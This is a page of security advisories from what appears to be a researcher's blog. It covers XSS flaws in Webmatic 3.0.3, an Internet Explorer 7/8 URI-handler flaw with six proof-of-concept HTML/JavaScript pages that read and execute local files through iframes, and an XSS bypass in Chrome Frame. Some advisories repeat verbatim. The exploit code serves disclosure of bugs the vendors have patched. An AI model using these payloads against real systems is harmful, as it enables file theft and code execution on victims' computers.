#################################
Webmatic 3.0.3 Multiple cross.site scripting
Vendor URL:http://www.valarsoft.com/
Advisore: http://lostmon.blogspot.com/2010/03/webmatic-303-multiple-crosssite.html
Vendor notified: YES
#################################
Webmatic contains a flaw that allows a remote cross site
scripting attack. This flaw exists because the application
does not validate multiple variables and form fields upon
submission to the 'index.php' script. This could allow a
user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.
##############
Versions
##############
valarsoft webmatic 3.0.3
It´s posible that prior versions
are afected
################
TimeLIne
##############
Discovered 13-01-2010
Vendor notify: 14-03-2010
vendor response:15-03-2010
Disclosure: 19-03-2010
###############
Private messages
################
Subject field form is vulnerable
a attacker can compose a PM with a malformed title
and it is executed wen the victims view his inbox
or open the PM.
#################
Forums
#################
Search field form ,filer variable
and title form field affected.
a attacker can compose a post with a malformed title
and wen a victim try to browse the forum the xss is
executed, also the attacker can compose a search url
with xss in filter variable or put the xss in search
form field to execute it.
##################
Chat room
###################
Nickname form field affected
a attacker can use a malformed nick name with xss and
wen he join in a channel the xss is executed in all
channel´s users.
######################
News
####################
Title form filed affected
a attacker can compose a new with a malformed title and
wen a user browse the news sections the xss is executed
also if the new has a "resume" in home page, all users
wen load the page are afected by xss.
pg variable affected
a attacker can compose a malformed URL in news sections and
insert some xss code in 'pg' variable , wen a victim clink in
this url the xss is executed.
#########################
banners section
#########################
Title and label form fields
A remote user can add a banner
with a malformed title or/and malformed label
wen the attacker visit his banner the xss is executed
in his own banner management.
Also if a victim visit this banner the xss is executed.
############################€ND#############################
Thns to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Internet explorer 7 & 8 URL Validation Vulnerability
Wednesday, February 10, 2010
############################################
Internet explorer 7 & 8 url validation vulnerability
Original Advisore: http://lostmon.blogspot.com/
2010/02/internet-explorer-7-8-url-validation.html
Vendor URl: http://www.microsoft.com
related adv:http://lostmon.blogspot.com/
2010/02/internet-explorer-6-7-8-url-validation.html
related bulletin: MS10-002 and ms10-007
Related CVE 2010-0027
Related OSVDB ID: 62245 and 62245
Related Secunia: SA38501 and SA38209
Related BID: 37884
############################################
############
Description
############
A remote code execution vulnerability exists in the way
that Internet Explorer incorrectly validates input. An
attacker could exploit the vulnerability by constructing
a specially crafted URL. When a user clicks the URL, the
vulnerability could allow remote code execution. An
attacker who successfully exploited this vulnerability
could gain the same user rights as the logged-on user.
If a user is logged on with administrative user rights,
#################
Versions afected
#################
I have tested in Internet Explorer 7 & 8
in this versions of windows
All versions of Windows 7
Windows xp home
Windows xs pro
So you can look the explotability index
From Relared Microsoft bulletin to get
a complete List of products affected.
#############
Timeline
#############
discovered 05-11-2009
Reported to vendor 15-11-2009
Vendor response:15-11-2009
vendor accepts in case manager 19-11-2009
vendor patch 21-01-2010
Vendor Patch2:09-02-2010
Public Disclosure: 21-01-2010
Details Disclosure:10-02-2010
##############
Solution
##############
See
http://www.microsoft.com/technet/security/Bulletin/ms10-002.mspx
and
http://www.microsoft.com/technet/security/Bulletin/ms10-007.mspx
for more details and for download vendor's patch
#######################
Sample code and PoC´s
#######################
This Vulnerability is bassed in the way
that Internet explorer validate Uri handlers
and the special chart '#'
for testing and undestanding first open internet explorer
and write in teh address bar a fake handler like `handler:'
it cause that IE shows 'res://ieframe.dll/unknownprotocol.htm'
internal page , because the protocol is unknow.
if we do => handler:http://[some-host]' Ie wait to open
the host, but don´t show any error or unknow protocol
error page.
If we Write at the adrress bar 'handler:handler2:'
IE shows again 'res://ieframe.dll/unknownprotocol.htm' page.
But if we concatenate two unknow protocol handlers and
use the special char '#' like 'handler:handler#:'
internet explorer shows a alert warning
with 'internet explorer can´t find file:///'
With this convination IE use file: protocol handler.
With this alert we can think... if we concatenate two handlers and #
char and a file path we can access to files on the hard disk.
"handler:handler#:c:\windows\calc.exe'
But we get again 'internet explorer can´t find the file'
Them we look for trasversal file access like
handler:handler#:../../../../C:\windows/calc.exe’
Them Ie promp us to download or execute the file.
we have bypass the restrictions!!!
so we are working in the address bar
Can a web page use this issue to make the same and ask
for download it ? YES
we can construct a web page with a iframe like:
############# PoC one #################
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\windows/calc.exe"></html>
################# EOF #################
If we open it via local folder, or via local server or
lan server or remote server, in all cases iE ask for download
them we can access any file in the hard disk so
can we execute or read the content of a file ?? YES
if we know a txt file path we can do similar
( put a txt file in c: root and wite some content it)
and them :
############## PoC Two #############
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\our_txtfile.txt"></html>
############# EOF #################
wen we open this Poc , it read the content from our_txtfile.txt
and show it in the frame.
we can execute files ?? YES
we can execute a html file or xml file or search-ms files
from hard disk for example:
############# PoC Tree ###############
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms">
</iframe>
</html>
############### EOF ###########
if we look it executes Explorer with a local search :D
can we read the content of any file and upload it to a server or
manage the content ??
i don´t have found a way to do it
all times internet explorer denies the access to the content from
iframe.
############# PoC four ##############
<html>
<head>
</head>
<body>
<script type="text/javascript">
function getContentFromIframe(iFrameName)
{
var myIFrame = document.getElementById(iFrameName);
var content = myIFrame.contentWindow.document.body.innerHTML;
alert('content: ' + content);
content = 'change iframe content';
myIFrame.contentWindow.document.body.innerHTML = content;
}
</script> <iframe id="myIframe"
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms"></iframe>
<a href="#" onclick="getContentFromIframe('myIframe')">Get the content</a>
</body>
</html>
##################### EOF #############################
it give a access deniet error
if we look to use XMLHttpRequest()
it does not work again and access is denied:
########### PoC Five ######################
var contents;
var req;
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open(’GET’,
‘handler:document.write%28'shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms’,
true);
req.send(”);
############ EOF #############
if we use it as a activex it
shows again a access denied :P
############### PoC six #############
<html><body><div>
<script>
function getHTTPObject()
{
if (typeof XMLHttpRequest != 'undefined')
{
return new XMLHttpRequest();
}
try {
return new ActiveXObject("Msxml2.XMLHTTP"); }
catch (e)
{
try
{
return new ActiveXObject("Microsoft.XMLHTTP");
}
catch (e) {}
}
return false;
}
x = getHTTPObject();
x.open("GET","shit:shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms",false);
x.send(null);
alert(x.responseText);
</script>
</div></body></html>
################ EOF ######################
Them we can think that we can read txt files , execute html,xml
search-ms files , and download and execute Binaries files from the
victims hard disk , only with view a crafted web page.
Microsoft has pached it and has release a secutiry bulletin
that solve this issue see
http://www.microsoft.com/technet/security/Bulletin/ms10-002.mspx
and
http://www.microsoft.com/technet/security/Bulletin/ms10-007.mspx
for details and for download the security update that solve this
issue and seven vulnerabilities more.
#################### €nd ################
Thnx to Google security Team for his support
Thnx to MSRC for his support and acknowledgments
Thnx To icar0 & sha0 from Badchecksum
Thnx To Brink For test with me in some windows :D
Thns to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Internet explorer 7 & 8 url validation vulnerability
Original Advisore: http://lostmon.blogspot.com/
2010/02/internet-explorer-7-8-url-validation.html
Vendor URl: http://www.microsoft.com
related adv:http://lostmon.blogspot.com/
2010/02/internet-explorer-6-7-8-url-validation.html
related bulletin: MS10-002 and ms10-007
Related CVE 2010-0027
Related OSVDB ID: 62245 and 62245
Related Secunia: SA38501 and SA38209
Related BID: 37884
############################################
############
Description
############
A remote code execution vulnerability exists in the way
that Internet Explorer incorrectly validates input. An
attacker could exploit the vulnerability by constructing
a specially crafted URL. When a user clicks the URL, the
vulnerability could allow remote code execution. An
attacker who successfully exploited this vulnerability
could gain the same user rights as the logged-on user.
If a user is logged on with administrative user rights,
#################
Versions afected
#################
I have tested in Internet Explorer 7 & 8
in this versions of windows
All versions of Windows 7
Windows xp home
Windows xs pro
So you can look the explotability index
From Relared Microsoft bulletin to get
a complete List of products affected.
#############
Timeline
#############
discovered 05-11-2009
Reported to vendor 15-11-2009
Vendor response:15-11-2009
vendor accepts in case manager 19-11-2009
vendor patch 21-01-2010
Vendor Patch2:09-02-2010
Public Disclosure: 21-01-2010
Details Disclosure:10-02-2010
##############
Solution
##############
See
http://www.microsoft.com/technet/security/Bulletin/ms10-002.mspx
and
http://www.microsoft.com/technet/security/Bulletin/ms10-007.mspx
for more details and for download vendor's patch
#######################
Sample code and PoC´s
#######################
This Vulnerability is bassed in the way
that Internet explorer validate Uri handlers
and the special chart '#'
for testing and undestanding first open internet explorer
and write in teh address bar a fake handler like `handler:'
it cause that IE shows 'res://ieframe.dll/unknownprotocol.htm'
internal page , because the protocol is unknow.
if we do => handler:http://[some-host]' Ie wait to open
the host, but don´t show any error or unknow protocol
error page.
If we Write at the adrress bar 'handler:handler2:'
IE shows again 'res://ieframe.dll/unknownprotocol.htm' page.
But if we concatenate two unknow protocol handlers and
use the special char '#' like 'handler:handler#:'
internet explorer shows a alert warning
with 'internet explorer can´t find file:///'
With this convination IE use file: protocol handler.
With this alert we can think... if we concatenate two handlers and #
char and a file path we can access to files on the hard disk.
"handler:handler#:c:\windows\calc.exe'
But we get again 'internet explorer can´t find the file'
Them we look for trasversal file access like
handler:handler#:../../../../C:\windows/calc.exe’
Them Ie promp us to download or execute the file.
we have bypass the restrictions!!!
so we are working in the address bar
Can a web page use this issue to make the same and ask
for download it ? YES
we can construct a web page with a iframe like:
############# PoC one #################
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\windows/calc.exe"></html>
################# EOF #################
If we open it via local folder, or via local server or
lan server or remote server, in all cases iE ask for download
them we can access any file in the hard disk so
can we execute or read the content of a file ?? YES
if we know a txt file path we can do similar
( put a txt file in c: root and wite some content it)
and them :
############## PoC Two #############
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\our_txtfile.txt"></html>
############# EOF #################
wen we open this Poc , it read the content from our_txtfile.txt
and show it in the frame.
we can execute files ?? YES
we can execute a html file or xml file or search-ms files
from hard disk for example:
############# PoC Tree ###############
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms">
</iframe>
</html>
############### EOF ###########
if we look it executes Explorer with a local search :D
can we read the content of any file and upload it to a server or
manage the content ??
i don´t have found a way to do it
all times internet explorer denies the access to the content from
iframe.
############# PoC four ##############
<html>
<head>
</head>
<body>
<script type="text/javascript">
function getContentFromIframe(iFrameName)
{
var myIFrame = document.getElementById(iFrameName);
var content = myIFrame.contentWindow.document.body.innerHTML;
alert('content: ' + content);
content = 'change iframe content';
myIFrame.contentWindow.document.body.innerHTML = content;
}
</script> <iframe id="myIframe"
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms"></iframe>
<a href="#" onclick="getContentFromIframe('myIframe')">Get the content</a>
</body>
</html>
##################### EOF #############################
it give a access deniet error
if we look to use XMLHttpRequest()
it does not work again and access is denied:
########### PoC Five ######################
var contents;
var req;
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open(’GET’,
‘handler:document.write%28'shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms’,
true);
req.send(”);
############ EOF #############
if we use it as a activex it
shows again a access denied :P
############### PoC six #############
<html><body><div>
<script>
function getHTTPObject()
{
if (typeof XMLHttpRequest != 'undefined')
{
return new XMLHttpRequest();
}
try {
return new ActiveXObject("Msxml2.XMLHTTP"); }
catch (e)
{
try
{
return new ActiveXObject("Microsoft.XMLHTTP");
}
catch (e) {}
}
return false;
}
x = getHTTPObject();
x.open("GET","shit:shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms",false);
x.send(null);
alert(x.responseText);
</script>
</div></body></html>
################ EOF ######################
Them we can think that we can read txt files , execute html,xml
search-ms files , and download and execute Binaries files from the
victims hard disk , only with view a crafted web page.
Microsoft has pached it and has release a secutiry bulletin
that solve this issue see
http://www.microsoft.com/technet/security/Bulletin/ms10-002.mspx
and
http://www.microsoft.com/technet/security/Bulletin/ms10-007.mspx
for details and for download the security update that solve this
issue and seven vulnerabilities more.
#################### €nd ################
Thnx to Google security Team for his support
Thnx to MSRC for his support and acknowledgments
Thnx To icar0 & sha0 from Badchecksum
Thnx To Brink For test with me in some windows :D
Thns to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Categories:
Acknowledgments,
browsers,
bug,
patch,
security,
vulnerability
Internet explorer 6 7 8 URL Validation Vulnerability
Thursday, January 21, 2010
###################################
Internet explorer 6 7 and 8 URL Validation Vulnerability
Vendor :http://www.Microsoft.com
Vendor notify:YES vendor confirmed :YES
REF Bulletin:MS10-002
#########################################
A remote code execution vulnerability exists in the way that Internet Explorer incorrectly validates input. An attacker could exploit the vulnerability by constructing a specially crafted URL. When a user clicks the URL, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
To view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see MS10-002 and CVE-2010-0027.
No more details at this time I have a PoC But At this moment it, is private.
Time Line for this vulnerability:
discovered 05-11-2009
Reported to vendor 15-11-2009
Vendor response:15-11-2009
vendor accepts in case manager 19-11-2009
vendor patch 21-01-2010
#################€nd#############
Thnx to estrella To be mi ligth
Thnx To icar0 & sha0 from Badchecksum
Thnx To Google security Team For support
Thnx To MSRC for Support
atentamente:
Security Research & Analisys.
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Internet explorer 6 7 and 8 URL Validation Vulnerability
Vendor :http://www.Microsoft.com
Vendor notify:YES vendor confirmed :YES
REF Bulletin:MS10-002
#########################################
A remote code execution vulnerability exists in the way that Internet Explorer incorrectly validates input. An attacker could exploit the vulnerability by constructing a specially crafted URL. When a user clicks the URL, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
To view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see MS10-002 and CVE-2010-0027.
No more details at this time I have a PoC But At this moment it, is private.
Time Line for this vulnerability:
discovered 05-11-2009
Reported to vendor 15-11-2009
Vendor response:15-11-2009
vendor accepts in case manager 19-11-2009
vendor patch 21-01-2010
#################€nd#############
Thnx to estrella To be mi ligth
Thnx To icar0 & sha0 from Badchecksum
Thnx To Google security Team For support
Thnx To MSRC for Support
atentamente:
Security Research & Analisys.
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Categories:
Acknowledgments,
browsers,
bug,
patch,
security,
vulnerability
Google Chrome Frame null domain XSS
Thursday, November 19, 2009
#####################################
Google Chrome Frame null domain XSS
vendor url:http://www.google.com/chromeframe
vendor changelog:http://googlechromereleases.blogspot.com/
2009/11/google-chrome-frame-update-bug-fixes.html
Advisore:http://lostmon.blogspot.com/
2009/11/google-chrome-frame-null-domain-xss.html
Vendor notify:yes Exploit available:YES
######################################
######################
Description by vendor
######################
Google Chrome Frame is a free plug-in for Internet Explorer.
Some advanced web apps, like Google Wave, use Google Chrome
Frame to provide you with additional features and better performance.
Google Chrome Frame is an early-stage open source
plug-in that seamlessly brings Google Chrome's open
web technologies and speedy JavaScript engine to
Internet Explorer.
################
version Afected
################
4.0.223.9 (Official Build 29618)
WebKit: 532.3
V8: 1.3.16
User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
AppleWebKit/532.3 (KHTML, like Gecko) Chrome/4.0.223.9 Safari/532.3
Not afected version:
4.0.245.1 (Official Build 31970)
WebKit: 532.5
V8: 1.3.18.6
User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.245.1 Safari/532.5
you can find aditional information here:
http://googlechromereleases.blogspot.com/
2009/11/google-chrome-frame-update-bug-fixes.html
#####################
Cross Site scripting
#####################
Create a html document and some to test =>
<iframe src="javascript:alert(1)></iframe>
=> this opens the iframe and execute the alert
( this is correct)
<iframe src="cf:javascript:alert(1)></iframe>
this does not work , not show the alert ( correct)
and here is the flaw =>
<iframe src="cf:view-source:javascript:alert(1)></iframe>
This show & executed the alert it works on local & remote
scenario or via address bar too.
This bypassed cross-origin protections !!!
For google chrome browser test this
at the address bar =>
view-source:javascript:alert(1)
this execute the alert but recently google has made changes
in about:blank page and this issue is only exploitable
via address bar ,not in a iframe or frame or html document
so for that i think that this issue isn´t exploitable in a
remote scenario.
###########
crashes
###########
cf:view-source:about@: crash
cf:about@: => crashing the tab
##########
Solution
############
Google has automatic release a new version
of Chrome Frame 4.0.245.1 (Official Build 31970)
and this version is not afected.
#################€nd#############
Thnx to estrella To be mi ligth
Thnx To icar0 & sha0 from Badchecksum
Thnx To Google security Team
atentamente:
Security Research & Analisys.
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Google Chrome Frame null domain XSS
vendor url:http://www.google.com/chromeframe
vendor changelog:http://googlechromereleases.blogspot.com/
2009/11/google-chrome-frame-update-bug-fixes.html
Advisore:http://lostmon.blogspot.com/
2009/11/google-chrome-frame-null-domain-xss.html
Vendor notify:yes Exploit available:YES
######################################
######################
Description by vendor
######################
Google Chrome Frame is a free plug-in for Internet Explorer.
Some advanced web apps, like Google Wave, use Google Chrome
Frame to provide you with additional features and better performance.
Google Chrome Frame is an early-stage open source
plug-in that seamlessly brings Google Chrome's open
web technologies and speedy JavaScript engine to
Internet Explorer.
################
version Afected
################
4.0.223.9 (Official Build 29618)
WebKit: 532.3
V8: 1.3.16
User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
AppleWebKit/532.3 (KHTML, like Gecko) Chrome/4.0.223.9 Safari/532.3
Not afected version:
4.0.245.1 (Official Build 31970)
WebKit: 532.5
V8: 1.3.18.6
User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.245.1 Safari/532.5
you can find aditional information here:
http://googlechromereleases.blogspot.com/
2009/11/google-chrome-frame-update-bug-fixes.html
#####################
Cross Site scripting
#####################
Create a html document and some to test =>
<iframe src="javascript:alert(1)></iframe>
=> this opens the iframe and execute the alert
( this is correct)
<iframe src="cf:javascript:alert(1)></iframe>
this does not work , not show the alert ( correct)
and here is the flaw =>
<iframe src="cf:view-source:javascript:alert(1)></iframe>
This show & executed the alert it works on local & remote
scenario or via address bar too.
This bypassed cross-origin protections !!!
For google chrome browser test this
at the address bar =>
view-source:javascript:alert(1)
this execute the alert but recently google has made changes
in about:blank page and this issue is only exploitable
via address bar ,not in a iframe or frame or html document
so for that i think that this issue isn´t exploitable in a
remote scenario.
###########
crashes
###########
cf:view-source:about@: crash
cf:about@: => crashing the tab
##########
Solution
############
Google has automatic release a new version
of Chrome Frame 4.0.245.1 (Official Build 31970)
and this version is not afected.
#################€nd#############
Thnx to estrella To be mi ligth
Thnx To icar0 & sha0 from Badchecksum
Thnx To Google security Team
atentamente:
Security Research & Analisys.
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Categories:
Acknowledgments,
browsers,
bug,
crash,
security,
vulnerability,
XSS
Subscribe to:
Posts (Atom)